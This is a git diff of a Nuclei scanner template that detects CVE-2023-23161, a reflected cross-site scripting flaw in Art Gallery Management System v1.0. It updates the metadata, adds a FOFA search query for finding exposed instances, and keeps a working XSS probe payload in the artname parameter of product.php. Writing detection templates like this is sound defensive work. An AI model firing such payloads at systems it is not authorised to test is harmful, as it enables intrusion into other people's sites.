updated matcher & info

http/cves/2023/CVE-2023-23161.yaml

@@ -1,10 +1,11 @@
 id: CVE-2023-23161
 
 info:
-  name: Art Gallery Management System Project v1.0 - Reflected Cross-Site Scripting (XSS)
+  name: Art Gallery Management System Project v1.0 - Cross-Site Scripting
   author: ctflearner
   severity: medium
-  description: A reflected cross-site scripting (XSS) vulnerability in Art Gallery Management System Project v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the artname parameter under ART TYPE option in the navigation bar.
+  description: |
+    A reflected cross-site scripting (XSS) vulnerability in Art Gallery Management System Project v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the artname parameter under ART TYPE option in the navigation bar.
   reference:
     - https://www.exploit-db.com/exploits/51214
     - https://github.com/rahulpatwari/CVE/blob/main/CVE-2023-23161/CVE-2023-23161.txt
@@ -19,21 +20,25 @@ info:
     cpe: cpe:2.3:a:art_gallery_management_system_project:art_gallery_management_system:1.0:*:*:*:*:*:*:*
   metadata:
     max-request: 1
+    verified: true
+    fofa-query: title="Art Gallery Management System"
     vendor: art_gallery_management_system_project
     product: art_gallery_management_system
-  tags: cve,cve2023,packetstorm,xss
+  tags: cve,cve2023,art,gallery,xss
 
 http:
   - method: GET
     path:
-      - '{{BaseURL}}/Art-Gallery-MS-PHP/product.php?cid=1&&artname=%3Cimg%20src=1%20onerror=alert(document.domain)%3E'
+      - '{{BaseURL}}/product.php?cid=1&&artname=%3Cimg%20src=1%20onerror=alert(document.domain)%3E'
 
     matchers-condition: and
     matchers:
       - type: word
         part: body
         words:
-          - "<img src=1 onerror=alert(document.domain)>"
+          - 'center"><img src=1 onerror=alert(document.domain)>'
+          - 'Art Type'
+        condition: and
 
       - type: word
         part: header